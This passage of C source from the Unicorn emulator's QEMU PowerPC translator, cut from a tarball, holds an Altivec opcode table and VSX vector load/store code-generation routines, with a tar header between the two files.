PPC2_ISA300) #define GEN_VXFORM_300_EXT(name, opc2, opc3, inval) \ GEN_HANDLER_E(name, 0x04, opc2, opc3, inval, PPC_NONE, PPC2_ISA300) #define GEN_VXFORM_300_EO(name, opc2, opc3, opc4) \ GEN_HANDLER_E_2(name, 0x04, opc2, opc3, opc4, 0x00000000, PPC_NONE, \ PPC2_ISA300) #define GEN_VXFORM_DUAL(name0, name1, opc2, opc3, type0, type1) \ GEN_HANDLER_E(name0##_##name1, 0x4, opc2, opc3, 0x00000000, type0, type1) #define GEN_VXRFORM_DUAL(name0, name1, opc2, opc3, tp0, tp1) \ GEN_HANDLER_E(name0##_##name1, 0x4, opc2, opc3, 0x00000000, tp0, tp1), \ GEN_HANDLER_E(name0##_##name1, 0x4, opc2, (opc3 | 0x10), 0x00000000, tp0, tp1), GEN_VXFORM_DUAL(vaddubm, vmul10cuq, 0, 0, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vadduhm, vmul10ecuq, 0, 1, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vadduwm, 0, 2), GEN_VXFORM_207(vaddudm, 0, 3), GEN_VXFORM_DUAL(vsububm, bcdadd, 0, 16, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vsubuhm, bcdsub, 0, 17, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vsubuwm, bcdus, 0, 18, PPC_ALTIVEC, PPC2_ISA300), GEN_VXFORM_DUAL(vsubudm, bcds, 0, 19, PPC2_ALTIVEC_207, PPC2_ISA300), GEN_VXFORM_300(bcds, 0, 27), GEN_VXFORM(vmaxub, 1, 0), GEN_VXFORM(vmaxuh, 1, 1), GEN_VXFORM(vmaxuw, 1, 2), GEN_VXFORM_207(vmaxud, 1, 3), GEN_VXFORM(vmaxsb, 1, 4), GEN_VXFORM(vmaxsh, 1, 5), GEN_VXFORM(vmaxsw, 1, 6), GEN_VXFORM_207(vmaxsd, 1, 7), GEN_VXFORM(vminub, 1, 8), GEN_VXFORM(vminuh, 1, 9), GEN_VXFORM(vminuw, 1, 10), GEN_VXFORM_207(vminud, 1, 11), GEN_VXFORM(vminsb, 1, 12), GEN_VXFORM(vminsh, 1, 13), GEN_VXFORM(vminsw, 1, 14), GEN_VXFORM_207(vminsd, 1, 15), GEN_VXFORM_DUAL(vavgub, vabsdub, 1, 16, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vavguh, vabsduh, 1, 17, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vavguw, vabsduw, 1, 18, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vavgsb, 1, 20), GEN_VXFORM(vavgsh, 1, 21), GEN_VXFORM(vavgsw, 1, 22), GEN_VXFORM(vmrghb, 6, 0), GEN_VXFORM(vmrghh, 6, 1), GEN_VXFORM(vmrghw, 6, 2), GEN_VXFORM(vmrglb, 6, 4), GEN_VXFORM(vmrglh, 6, 5), GEN_VXFORM(vmrglw, 6, 6), GEN_VXFORM_300(vextublx, 6, 24), GEN_VXFORM_300(vextuhlx, 6, 25), GEN_VXFORM_DUAL(vmrgow, vextuwlx, 6, 26, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_300(vextubrx, 6, 28), GEN_VXFORM_300(vextuhrx, 6, 29), GEN_VXFORM_DUAL(vmrgew, vextuwrx, 6, 30, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM(vmuloub, 4, 0), GEN_VXFORM(vmulouh, 4, 1), GEN_VXFORM_DUAL(vmulouw, vmuluwm, 4, 2, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vmulosb, 4, 4), GEN_VXFORM(vmulosh, 4, 5), GEN_VXFORM_207(vmulosw, 4, 6), GEN_VXFORM(vmuleub, 4, 8), GEN_VXFORM(vmuleuh, 4, 9), GEN_VXFORM_207(vmuleuw, 4, 10), GEN_VXFORM(vmulesb, 4, 12), GEN_VXFORM(vmulesh, 4, 13), GEN_VXFORM_207(vmulesw, 4, 14), GEN_VXFORM(vslb, 2, 4), GEN_VXFORM(vslh, 2, 5), GEN_VXFORM_DUAL(vslw, vrlwnm, 2, 6, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_207(vsld, 2, 23), GEN_VXFORM(vsrb, 2, 8), GEN_VXFORM(vsrh, 2, 9), GEN_VXFORM(vsrw, 2, 10), GEN_VXFORM_207(vsrd, 2, 27), GEN_VXFORM(vsrab, 2, 12), GEN_VXFORM(vsrah, 2, 13), GEN_VXFORM(vsraw, 2, 14), GEN_VXFORM_207(vsrad, 2, 15), GEN_VXFORM_300(vsrv, 2, 28), GEN_VXFORM_300(vslv, 2, 29), GEN_VXFORM(vslo, 6, 16), GEN_VXFORM(vsro, 6, 17), GEN_VXFORM(vaddcuw, 0, 6), GEN_HANDLER_E_2(vprtybw, 0x4, 0x1, 0x18, 8, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E_2(vprtybd, 0x4, 0x1, 0x18, 9, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E_2(vprtybq, 0x4, 0x1, 0x18, 10, 0, PPC_NONE, PPC2_ISA300), GEN_VXFORM_DUAL(vsubcuw, xpnd04_1, 0, 22, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_300(bcdsr, 0, 23), GEN_VXFORM_300(bcdsr, 0, 31), GEN_VXFORM_DUAL(vaddubs, vmul10uq, 0, 8, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vadduhs, vmul10euq, 0, 9, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vadduws, 0, 10), GEN_VXFORM(vaddsbs, 0, 12), GEN_VXFORM_DUAL(vaddshs, bcdcpsgn, 0, 13, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vaddsws, 0, 14), GEN_VXFORM_DUAL(vsububs, bcdadd, 0, 24, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vsubuhs, bcdsub, 0, 25, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vsubuws, 0, 26), GEN_VXFORM_DUAL(vsubsbs, bcdtrunc, 0, 28, PPC_ALTIVEC, PPC2_ISA300), GEN_VXFORM(vsubshs, 0, 29), GEN_VXFORM_DUAL(vsubsws, xpnd04_2, 0, 30, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_207(vadduqm, 0, 4), GEN_VXFORM_207(vaddcuq, 0, 5), GEN_VXFORM_DUAL(vaddeuqm, vaddecuq, 30, 0xFF, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vsubuqm, bcdtrunc, 0, 20, PPC2_ALTIVEC_207, PPC2_ISA300), GEN_VXFORM_DUAL(vsubcuq, bcdutrunc, 0, 21, PPC2_ALTIVEC_207, PPC2_ISA300), GEN_VXFORM_DUAL(vsubeuqm, vsubecuq, 31, 0xFF, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM(vrlb, 2, 0), GEN_VXFORM(vrlh, 2, 1), GEN_VXFORM_DUAL(vrlw, vrlwmi, 2, 2, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vrld, vrldmi, 2, 3, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vsl, vrldnm, 2, 7, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vsr, 2, 11), GEN_VXFORM(vpkuhum, 7, 0), GEN_VXFORM(vpkuwum, 7, 1), GEN_VXFORM_207(vpkudum, 7, 17), GEN_VXFORM(vpkuhus, 7, 2), GEN_VXFORM(vpkuwus, 7, 3), GEN_VXFORM_207(vpkudus, 7, 19), GEN_VXFORM(vpkshus, 7, 4), GEN_VXFORM(vpkswus, 7, 5), GEN_VXFORM_207(vpksdus, 7, 21), GEN_VXFORM(vpkshss, 7, 6), GEN_VXFORM(vpkswss, 7, 7), GEN_VXFORM_207(vpksdss, 7, 23), GEN_VXFORM(vpkpx, 7, 12), GEN_VXFORM(vsum4ubs, 4, 24), GEN_VXFORM(vsum4sbs, 4, 28), GEN_VXFORM(vsum4shs, 4, 25), GEN_VXFORM(vsum2sws, 4, 26), GEN_VXFORM(vsumsws, 4, 30), GEN_VXFORM(vaddfp, 5, 0), GEN_VXFORM(vsubfp, 5, 1), GEN_VXFORM(vmaxfp, 5, 16), GEN_VXFORM(vminfp, 5, 17), #define GEN_VXRFORM1(opname, name, str, opc2, opc3) \ GEN_HANDLER2(name, str, 0x4, opc2, opc3, 0x00000000, PPC_ALTIVEC), #define GEN_VXRFORM1_300(opname, name, str, opc2, opc3) \ GEN_HANDLER2_E(name, str, 0x4, opc2, opc3, 0x00000000, PPC_NONE, PPC2_ISA300), #define GEN_VXRFORM(name, opc2, opc3) \ GEN_VXRFORM1(name, name, #name, opc2, opc3) \ GEN_VXRFORM1(name##_dot, name##_, #name ".", opc2, (opc3 | (0x1 << 4))) #define GEN_VXRFORM_300(name, opc2, opc3) \ GEN_VXRFORM1_300(name, name, #name, opc2, opc3) \ GEN_VXRFORM1_300(name##_dot, name##_, #name ".", opc2, (opc3 | (0x1 << 4))) GEN_VXRFORM_300(vcmpnezb, 3, 4) GEN_VXRFORM_300(vcmpnezh, 3, 5) GEN_VXRFORM_300(vcmpnezw, 3, 6) GEN_VXRFORM(vcmpgtsb, 3, 12) GEN_VXRFORM(vcmpgtsh, 3, 13) GEN_VXRFORM(vcmpgtsw, 3, 14) GEN_VXRFORM(vcmpgtub, 3, 8) GEN_VXRFORM(vcmpgtuh, 3, 9) GEN_VXRFORM(vcmpgtuw, 3, 10) GEN_VXRFORM_DUAL(vcmpeqfp, vcmpequd, 3, 3, PPC_ALTIVEC, PPC_NONE) GEN_VXRFORM(vcmpgefp, 3, 7) GEN_VXRFORM_DUAL(vcmpgtfp, vcmpgtud, 3, 11, PPC_ALTIVEC, PPC_NONE) GEN_VXRFORM_DUAL(vcmpbfp, vcmpgtsd, 3, 15, PPC_ALTIVEC, PPC_NONE) GEN_VXRFORM_DUAL(vcmpequb, vcmpneb, 3, 0, PPC_ALTIVEC, PPC_NONE) GEN_VXRFORM_DUAL(vcmpequh, vcmpneh, 3, 1, PPC_ALTIVEC, PPC_NONE) GEN_VXRFORM_DUAL(vcmpequw, vcmpnew, 3, 2, PPC_ALTIVEC, PPC_NONE) #define GEN_VXFORM_DUAL_INV(name0, name1, opc2, opc3, inval0, inval1, type) \ GEN_OPCODE_DUAL(name0##_##name1, 0x04, opc2, opc3, inval0, inval1, type, \ PPC_NONE) GEN_VXFORM_DUAL_INV(vspltb, vextractub, 6, 8, 0x00000000, 0x100000, PPC_ALTIVEC), GEN_VXFORM_DUAL_INV(vsplth, vextractuh, 6, 9, 0x00000000, 0x100000, PPC_ALTIVEC), GEN_VXFORM_DUAL_INV(vspltw, vextractuw, 6, 10, 0x00000000, 0x100000, PPC_ALTIVEC), GEN_VXFORM_300_EXT(vextractd, 6, 11, 0x100000), GEN_VXFORM_DUAL_INV(vspltisb, vinsertb, 6, 12, 0x00000000, 0x100000, PPC_ALTIVEC), GEN_VXFORM_DUAL_INV(vspltish, vinserth, 6, 13, 0x00000000, 0x100000, PPC_ALTIVEC), GEN_VXFORM_DUAL_INV(vspltisw, vinsertw, 6, 14, 0x00000000, 0x100000, PPC_ALTIVEC), GEN_VXFORM_300_EXT(vinsertd, 6, 15, 0x100000), GEN_VXFORM_300_EO(vnegw, 0x01, 0x18, 0x06), GEN_VXFORM_300_EO(vnegd, 0x01, 0x18, 0x07), GEN_VXFORM_300_EO(vextsb2w, 0x01, 0x18, 0x10), GEN_VXFORM_300_EO(vextsh2w, 0x01, 0x18, 0x11), GEN_VXFORM_300_EO(vextsb2d, 0x01, 0x18, 0x18), GEN_VXFORM_300_EO(vextsh2d, 0x01, 0x18, 0x19), GEN_VXFORM_300_EO(vextsw2d, 0x01, 0x18, 0x1A), GEN_VXFORM_300_EO(vctzb, 0x01, 0x18, 0x1C), GEN_VXFORM_300_EO(vctzh, 0x01, 0x18, 0x1D), GEN_VXFORM_300_EO(vctzw, 0x01, 0x18, 0x1E), GEN_VXFORM_300_EO(vctzd, 0x01, 0x18, 0x1F), GEN_VXFORM_300_EO(vclzlsbb, 0x01, 0x18, 0x0), GEN_VXFORM_300_EO(vctzlsbb, 0x01, 0x18, 0x1), GEN_VXFORM_300(vpermr, 0x1D, 0xFF), #define GEN_VXFORM_NOA(name, opc2, opc3) \ GEN_HANDLER(name, 0x04, opc2, opc3, 0x001f0000, PPC_ALTIVEC) GEN_VXFORM_NOA(vupkhsb, 7, 8), GEN_VXFORM_NOA(vupkhsh, 7, 9), GEN_VXFORM_207(vupkhsw, 7, 25), GEN_VXFORM_NOA(vupklsb, 7, 10), GEN_VXFORM_NOA(vupklsh, 7, 11), GEN_VXFORM_207(vupklsw, 7, 27), GEN_VXFORM_NOA(vupkhpx, 7, 13), GEN_VXFORM_NOA(vupklpx, 7, 15), GEN_VXFORM_NOA(vrefp, 5, 4), GEN_VXFORM_NOA(vrsqrtefp, 5, 5), GEN_VXFORM_NOA(vexptefp, 5, 6), GEN_VXFORM_NOA(vlogefp, 5, 7), GEN_VXFORM_NOA(vrfim, 5, 11), GEN_VXFORM_NOA(vrfin, 5, 8), GEN_VXFORM_NOA(vrfip, 5, 10), GEN_VXFORM_NOA(vrfiz, 5, 9), #define GEN_VXFORM_UIMM(name, opc2, opc3) \ GEN_HANDLER(name, 0x04, opc2, opc3, 0x00000000, PPC_ALTIVEC) GEN_VXFORM_UIMM(vcfux, 5, 12), GEN_VXFORM_UIMM(vcfsx, 5, 13), GEN_VXFORM_UIMM(vctuxs, 5, 14), GEN_VXFORM_UIMM(vctsxs, 5, 15), #define GEN_VAFORM_PAIRED(name0, name1, opc2) \ GEN_HANDLER(name0##_##name1, 0x04, opc2, 0xFF, 0x00000000, PPC_ALTIVEC) GEN_VAFORM_PAIRED(vmhaddshs, vmhraddshs, 16), GEN_VAFORM_PAIRED(vmsumubm, vmsummbm, 18), GEN_VAFORM_PAIRED(vmsumuhm, vmsumuhs, 19), GEN_VAFORM_PAIRED(vmsumshm, vmsumshs, 20), GEN_VAFORM_PAIRED(vsel, vperm, 21), GEN_VAFORM_PAIRED(vmaddfp, vnmsubfp, 23), GEN_VXFORM_DUAL(vclzb, vpopcntb, 1, 28, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vclzh, vpopcnth, 1, 29, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vclzw, vpopcntw, 1, 30, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vclzd, vpopcntd, 1, 31, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_300(vbpermd, 6, 23), GEN_VXFORM_207(vbpermq, 6, 21), GEN_VXFORM_207(vgbbd, 6, 20), GEN_VXFORM_207(vpmsumb, 4, 16), GEN_VXFORM_207(vpmsumh, 4, 17), GEN_VXFORM_207(vpmsumw, 4, 18), GEN_VXFORM_207(vpmsumd, 4, 19), GEN_VXFORM_207(vsbox, 4, 23), GEN_VXFORM_DUAL(vcipher, vcipherlast, 4, 20, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vncipher, vncipherlast, 4, 21, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_207(vshasigmaw, 1, 26), GEN_VXFORM_207(vshasigmad, 1, 27), GEN_VXFORM_DUAL(vsldoi, vpermxor, 22, 0xFF, PPC_ALTIVEC, PPC_NONE), �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate/vsx-impl.inc.c����������������������������������������������0000664�0000000�0000000�00000266604�14675241067�0022731�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/*** VSX extension ***/ static inline void get_cpu_vsrh(TCGContext *tcg_ctx, TCGv_i64 dst, int n) { tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, vsr64_offset(n, true)); } static inline void get_cpu_vsrl(TCGContext *tcg_ctx, TCGv_i64 dst, int n) { tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, vsr64_offset(n, false)); } static inline void set_cpu_vsrh(TCGContext *tcg_ctx, int n, TCGv_i64 src) { tcg_gen_st_i64(tcg_ctx, src, tcg_ctx->cpu_env, vsr64_offset(n, true)); } static inline void set_cpu_vsrl(TCGContext *tcg_ctx, int n, TCGv_i64 src) { tcg_gen_st_i64(tcg_ctx, src, tcg_ctx->cpu_env, vsr64_offset(n, false)); } static inline TCGv_ptr gen_vsr_ptr(TCGContext *tcg_ctx, int reg) { TCGv_ptr r = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, r, tcg_ctx->cpu_env, vsr_full_offset(reg)); return r; } #define VSX_LOAD_SCALAR(name, operation) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##operation(ctx, t0, EA); \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); \ /* NOTE: cpu_vsrl is undefined */ \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } VSX_LOAD_SCALAR(lxsdx, ld64_i64) VSX_LOAD_SCALAR(lxsiwax, ld32s_i64) VSX_LOAD_SCALAR(lxsibzx, ld8u_i64) VSX_LOAD_SCALAR(lxsihzx, ld16u_i64) VSX_LOAD_SCALAR(lxsiwzx, ld32u_i64) VSX_LOAD_SCALAR(lxsspx, ld32fs) static void gen_lxvd2x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } t0 = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); gen_qemu_ld64_i64(ctx, t0, EA); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); gen_qemu_ld64_i64(ctx, t0, EA); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), t0); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_lxvdsx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); gen_qemu_ld64_i64(ctx, t0, EA); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); tcg_gen_mov_i64(tcg_ctx, t1, t0); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), t1); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_lxvw4x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xth; TCGv_i64 xtl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); if (ctx->le_mode) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t0, EA, ctx->mem_idx, MO_LEQ); tcg_gen_shri_i64(tcg_ctx, t1, t0, 32); tcg_gen_deposit_i64(tcg_ctx, xth, t1, t0, 32, 32); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, t0, EA, ctx->mem_idx, MO_LEQ); tcg_gen_shri_i64(tcg_ctx, t1, t0, 32); tcg_gen_deposit_i64(tcg_ctx, xtl, t1, t0, 32, 32); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } else { tcg_gen_qemu_ld_i64(tcg_ctx, xth, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, xtl, EA, ctx->mem_idx, MO_BEQ); } set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); } static void gen_bswap16x8(TCGContext *tcg_ctx, TCGv_i64 outh, TCGv_i64 outl, TCGv_i64 inh, TCGv_i64 inl) { TCGv_i64 mask = tcg_const_i64(tcg_ctx, 0x00FF00FF00FF00FF); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); /* outh = ((inh & mask) << 8) | ((inh >> 8) & mask) */ tcg_gen_and_i64(tcg_ctx, t0, inh, mask); tcg_gen_shli_i64(tcg_ctx, t0, t0, 8); tcg_gen_shri_i64(tcg_ctx, t1, inh, 8); tcg_gen_and_i64(tcg_ctx, t1, t1, mask); tcg_gen_or_i64(tcg_ctx, outh, t0, t1); /* outl = ((inl & mask) << 8) | ((inl >> 8) & mask) */ tcg_gen_and_i64(tcg_ctx, t0, inl, mask); tcg_gen_shli_i64(tcg_ctx, t0, t0, 8); tcg_gen_shri_i64(tcg_ctx, t1, inl, 8); tcg_gen_and_i64(tcg_ctx, t1, t1, mask); tcg_gen_or_i64(tcg_ctx, outl, t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, mask); } static void gen_bswap32x4(TCGContext *tcg_ctx, TCGv_i64 outh, TCGv_i64 outl, TCGv_i64 inh, TCGv_i64 inl) { TCGv_i64 hi = tcg_temp_new_i64(tcg_ctx); TCGv_i64 lo = tcg_temp_new_i64(tcg_ctx); tcg_gen_bswap64_i64(tcg_ctx, hi, inh); tcg_gen_bswap64_i64(tcg_ctx, lo, inl); tcg_gen_shri_i64(tcg_ctx, outh, hi, 32); tcg_gen_deposit_i64(tcg_ctx, outh, outh, hi, 32, 32); tcg_gen_shri_i64(tcg_ctx, outl, lo, 32); tcg_gen_deposit_i64(tcg_ctx, outl, outl, lo, 32, 32); tcg_temp_free_i64(tcg_ctx, hi); tcg_temp_free_i64(tcg_ctx, lo); } static void gen_lxvh8x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xth; TCGv_i64 xtl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); tcg_gen_qemu_ld_i64(tcg_ctx, xth, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, xtl, EA, ctx->mem_idx, MO_BEQ); if (ctx->le_mode) { gen_bswap16x8(tcg_ctx, xth, xtl, xth, xtl); } set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); } static void gen_lxvb16x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xth; TCGv_i64 xtl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); tcg_gen_qemu_ld_i64(tcg_ctx, xth, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, xtl, EA, ctx->mem_idx, MO_BEQ); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); } #define VSX_VECTOR_LOAD(name, op, indexed) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ int xt; \ TCGv EA; \ TCGv_i64 xth; \ TCGv_i64 xtl; \ \ if (indexed) { \ xt = xT(ctx->opcode); \ } else { \ xt = DQxT(ctx->opcode); \ } \ \ if (xt < 32) { \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ } else { \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ } \ xth = tcg_temp_new_i64(tcg_ctx); \ xtl = tcg_temp_new_i64(tcg_ctx); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ if (indexed) { \ gen_addr_reg_index(ctx, EA); \ } else { \ gen_addr_imm_index(ctx, EA, 0x0F); \ } \ if (ctx->le_mode) { \ tcg_gen_qemu_##op(tcg_ctx, xtl, EA, ctx->mem_idx, MO_LEQ); \ set_cpu_vsrl(tcg_ctx, xt, xtl); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ tcg_gen_qemu_##op(tcg_ctx, xth, EA, ctx->mem_idx, MO_LEQ); \ set_cpu_vsrh(tcg_ctx, xt, xth); \ } else { \ tcg_gen_qemu_##op(tcg_ctx, xth, EA, ctx->mem_idx, MO_BEQ); \ set_cpu_vsrh(tcg_ctx, xt, xth); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ tcg_gen_qemu_##op(tcg_ctx, xtl, EA, ctx->mem_idx, MO_BEQ); \ set_cpu_vsrl(tcg_ctx, xt, xtl); \ } \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, xth); \ tcg_temp_free_i64(tcg_ctx, xtl); \ } VSX_VECTOR_LOAD(lxv, ld_i64, 0) VSX_VECTOR_LOAD(lxvx, ld_i64, 1) #define VSX_VECTOR_STORE(name, op, indexed) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ int xt; \ TCGv EA; \ TCGv_i64 xth; \ TCGv_i64 xtl; \ \ if (indexed) { \ xt = xT(ctx->opcode); \ } else { \ xt = DQxT(ctx->opcode); \ } \ \ if (xt < 32) { \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ } else { \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ } \ xth = tcg_temp_new_i64(tcg_ctx); \ xtl = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xth, xt); \ get_cpu_vsrl(tcg_ctx, xtl, xt); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ if (indexed) { \ gen_addr_reg_index(ctx, EA); \ } else { \ gen_addr_imm_index(ctx, EA, 0x0F); \ } \ if (ctx->le_mode) { \ tcg_gen_qemu_##op(tcg_ctx, xtl, EA, ctx->mem_idx, MO_LEQ); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ tcg_gen_qemu_##op(tcg_ctx, xth, EA, ctx->mem_idx, MO_LEQ); \ } else { \ tcg_gen_qemu_##op(tcg_ctx, xth, EA, ctx->mem_idx, MO_BEQ); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ tcg_gen_qemu_##op(tcg_ctx, xtl, EA, ctx->mem_idx, MO_BEQ); \ } \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, xth); \ tcg_temp_free_i64(tcg_ctx, xtl); \ } VSX_VECTOR_STORE(stxv, st_i64, 0) VSX_VECTOR_STORE(stxvx, st_i64, 1) #ifdef TARGET_PPC64 #define VSX_VECTOR_LOAD_STORE_LENGTH(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_ptr xt; \ \ if (xT(ctx->opcode) < 32) { \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ } else { \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ 